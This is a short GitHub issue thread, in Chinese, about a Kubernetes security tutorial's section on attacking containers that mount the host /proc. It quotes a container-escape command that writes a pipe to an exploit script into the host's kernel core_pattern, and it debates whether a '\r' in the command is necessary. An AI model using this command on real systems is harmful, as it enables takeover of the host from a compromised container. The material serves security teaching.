### ISSUE TITLE
5.4.2 攻击挂载了主机 /proc 目录的容器中的命令多了一个\r

### ISSUE THREAD

**Issue by WhiteHSBG** [neargle/my-re0-k8s-security#3]
原文为：
```
echo -e "|/var/lib/docker/overlay2/a1a1e60a9967d6497f22f5df21b185708403e2af22eab44cfc2de05ff8ae115f/diff/exp.sh \rcore" > /host_proc/sys/kernel/core_pattern
```
多了个\r，应为：
```
echo -e "|/var/lib/docker/overlay2/a1a1e60a9967d6497f22f5df21b185708403e2af22eab44cfc2de05ff8ae115f/diff/exp.sh core" > /host_proc/sys/kernel/core_pattern
```

**Comment by neargle** [comment]
> 原文为：
> 
> ```
> echo -e "|/var/lib/docker/overlay2/a1a1e60a9967d6497f22f5df21b185708403e2af22eab44cfc2de05ff8ae115f/diff/exp.sh \rcore" > /host_proc/sys/kernel/core_pattern
> ```
> 
> 多了个\r，应为：
> 
> ```
> echo -e "|/var/lib/docker/overlay2/a1a1e60a9967d6497f22f5df21b185708403e2af22eab44cfc2de05ff8ae115f/diff/exp.sh core" > /host_proc/sys/kernel/core_pattern
> ```

有更多信息吗？我理解这里是需要一个`/r`的，这在这个场景下是必要的。

**Comment by neargle** [comment]
先关闭了哈
